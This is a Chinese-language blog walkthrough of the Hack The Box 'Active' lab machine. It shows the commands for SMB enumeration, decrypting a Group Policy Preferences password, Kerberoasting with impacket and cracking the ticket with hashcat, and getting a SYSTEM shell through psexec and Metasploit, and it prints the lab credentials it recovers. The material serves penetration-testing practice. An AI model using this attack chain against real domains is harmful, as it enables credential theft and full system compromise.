Hack The Box -----------------------Active

最新推荐文章于 2024-07-06 20:02:29 发布
最新推荐文章于 2024-07-06 20:02:29 发布
阅读量6.9k 收藏 10
点赞数
分类专栏: 经验心得 HTB靶场题解集合
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/85009659
版权

这次的靶机是Hackthebox的Active

靶机IP地址:10.10.10.100

========================================================================================

信息收集

nmap -sV -sT 10.10.10.100 

Kerberos在88,netbios-ssn在139,ldap在389和3268。

 

SMB枚举

由于目标机器在139端口上开放了netbios-ssn,我们用smbmao扫描下看看能得到什么有用的信息

smbmap -H 10.10.10.100 

这里我们发现只有Replication  允许读

 

我们用smbclient来访问下

之后,我们访问共享我们会发现一个名为Groups.xml

在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\

通过下载查看文件,我们将找到用户名和加密密码。

 

解密GPP

刚刚哪个加密的密码cpassword就是组策略密码GPP

我们利用gpp-decrypt来进行解密

我们得到了密码GPPstillStandingStrong2k18

 

 

现在我们有凭证SVC_TGS:GPPstillStandingStrong2k18我们可以拥有用户账号

 

smbclient //10.10.10.100/Users -U SVC_TGS

 

 

Kerberoasting

现在,如果我们返回到我们的nmap扫描。

我们将看到我们在端口88上运行了kerberos,我们现在拥有一个用户,所以我们将去kerberoasting

 

如果你不知道什么是kerberoasting技术,你可以阅读这3篇文章

第1部分

第2部分

第3部分

 

首先,我们将10.10.10.100添加到/ etc / hosts中

 

 我们从Github下载并安装impacket以使用其python类GetUserSPN.py

github地址;https://github.com/SecureAuthCorp/impacket

 

这里的话我kali我里面会报出这个错误

不知道怎么解决,希望有会的人麻烦评论下。

然后我换了到win下进行操作

也是一样的  需要吧

10.10.10.100 active.htb 添加到HOSTS中去。

然后执行命令

python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18

我们把其中的hash复制到hash.txt进行破解 

然后在hashcat的帮助下我们找到了哈希模式,结果它显示了13100 for Kerberos 5 TGS​​-REP etype 23

hashcat -h |grep -i tgs

最后,是时候破解哈希并使用rockyou.txt wordlist获取密码。

hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force ---show

然后我们得到了管理员密码:Ticketmaster1968

 

下面介绍2种方法拿root shell

①还是用impact/example里面的psexec.py来获取root shell

python psexec.py administrator@active.htb

②用metaploit框架并运行以下模块来生成完整的权限系统shell

msf > use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 10.10.10.100
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ticketmaster1968
msf exploit(windows/smb/psexec) > exploit

大方子
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
css Table布局-display:table
qq_35396397的博客
11-22 721
使用表格布局一直是一个敏感的主题。一般情况下,Web开发人员考虑基于表格布局是禁忌。 尽管反对的理由看起来证据很充分,但是大多数开发者除了谴责基于表格的布局,都无法提供完善的使用场景。 “表格不好。” 从早期反对HTML Table(<table>标签)开始这种势头就非常强劲。 几代开发者被成功洗脑,根深蒂固的认为:任何使用表格都是邪恶的。 诚然,我也是避免使用...
Bochs - The cross platform IA-32 (x86) emulator
03-14
[3164945] hack to compile under WIN64 by Darek Mihocka and Stanislav [3164073] Fine grain SMC invalidation by Stanislav [1539417] write protect for floppy drives by Ben Lunt [2862322] fixes for ...
Hack The Box -- Blazorized
最新发布
qq_22792465的博客
07-06 1204
http://blazorized.htb/_framework/blazor.webassembly.js 中存在一些json文件,min.js中是编码文件并没有找到其他路径。没见过的直接给度娘+gpt,既然是基于Blazor框架那就搜一搜Blazor的信息。
Hack The Box-Blazorized
m0_52742680的博客
07-02 3151
HackTheBox S5赛季靶场第十一篇
Hack The Box(黑客盒子)Redeemer篇
轻舟已过万重山
06-09 311
题目已披露的靶机缺陷:Redis数据库可能存在缺陷,可能存在匿名访问缺陷。
Hack The Box-Freelancer
m0_52742680的博客
06-04 2820
HackTheBox S5赛季靶场第七篇
HackTheBox -- RedPanda
weixin_52270928的博客
09-13 2390
HackTheBox——RedPanda(writeup)
uni-app scroll-view水平居中
一出好剧
07-03 1614
主要是为了实现 scroll-view 滑动之后的选中项能够水平居中(微信小程序同样适用,需要改几个api) <template> <scroll-view class="head__scroll" scroll-x :scroll-left="scrollLeft"> <div class="head__scroll_sport">测试左侧展示内容</div> <template v-for="(item, index) in op
Hack The Box-Jab
分享
03-16 867
从扫描信息分析,发现对方开启了聊天服务,利用此服务漏洞获取到初级powershell权限,经过系统信息服务排查,发现此系统开放了 openfire-service 服务,利用内网穿透工具进行内网端口转发,我们发现此服务存在漏洞!利用漏洞我们即可拿到system 权限的shell
HackTheBox-Intelligence WP
h1nt的博客
10-19 2941
0x01 端口探测 使用nmap对靶机进行探测: nmap -sV -sC 10.10.10.248 比较标准的DC端口,还多了个WEB的80。 0x02 user.txt 进WEB看看,发现在主页目录可以下载文档。主页能下载的文档文件名为2020-01-01-upload.pdf 遂写了脚本进行爆破,将所有的文档下载下来: import requests for month in range(1, 13): for day in range(1, 32):
hack the box - tier0
32bin的博客
10-21 1095
Recommended Academy Modules INTRO TO ACADEMY STARTING POINTTier 0 MachinesTagsEnumerationTelnetExternalPenetration Tester Level 1SOFT RESETReset MachineOPENWalkthroughCONNECTConnect to Starting Point VPN before starting the machineSpawn MachineClick to Spa
Crafty - hackthebox
tanbinn的博客
05-21 699
hackthebox的Crafty靶场
css-dictionary(CSS常用英语词汇详解)
12-16
- **Hack**: 用于CSS中的一些技巧。指在不同浏览器间兼容性不佳的情况下,采取的一些特殊处理方法。 - **Here**: 这里。通常指当前位置或具体上下文中提及的位置。 - **Hand**: 手形鼠标指针。CSS中的一种鼠标样式,...
最全前端面试题-2(css篇-上百篇题集整理1个月)
05-04
【伪类和伪元素】:伪类如`:hover`、`:active`、`:focus`等,表示元素的特定状态;伪元素如`::before`、`::after`用于在元素内容前后插入内容。 【display属性】:`block`、`inline`和`inline-block`分别对应块级...
Hack_Guide
02-17
"Hack_Guide"可能会深入讲解CSS选择器的使用,包括类选择器(.class)、ID选择器 (#id)、元素选择器(element)等,以及伪类(如`:hover`, `:active`)和伪元素(如`::before`, `::after`)的应用。 此外,还将介绍...
css浏览器兼容整理
03-02
- 可以使用`:link`, `:visited`, `:hover`, `:active`伪类来添加不同的样式。 3. **链接(a标签)的边框与背景** - 可以通过设置`border`和`background-color`属性来控制链接的外观。 4. **ff不支持expression...
【HTB系列】靶机LaCasaDePapel的渗透测试
大方子
08-07 3471
(因为是转发来的,若出现排版,乱码等问题就直接看有道的文档)有道分享链接地址: 文档:【HTB系列】靶机LaCasaDePapel的渗透测... 链接:http://note.youdao.com/noteshare?id=a475032917f4ec0bb32ce727d27509fd&sub=9534965F4D854085A4051A9957ADA6AD 知识点: 1. ...
【HTB系列】靶机Mischief的渗透测试详解
大方子
01-06 3231
这次的目标靶机是 hackthebox的 Mischief IP地址:10.10.10.92 ====================================================================================== 首先我们用nmap对目标机器进行扫描 nmap -T4 -sV -p- 10.10.10.92 我们访...
H-ui前端框架详细使用指南
3.2.4 CSSHack介绍了针对不同浏览器的兼容性解决方案。 3.2.5 键盘按钮keycode提供了关于键盘按键对应码的信息,用于键盘事件的处理。 3.2.6 ARIA无障碍网页应用属性讨论了如何创建对残障用户友好的网页。 3.2.7 CSS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值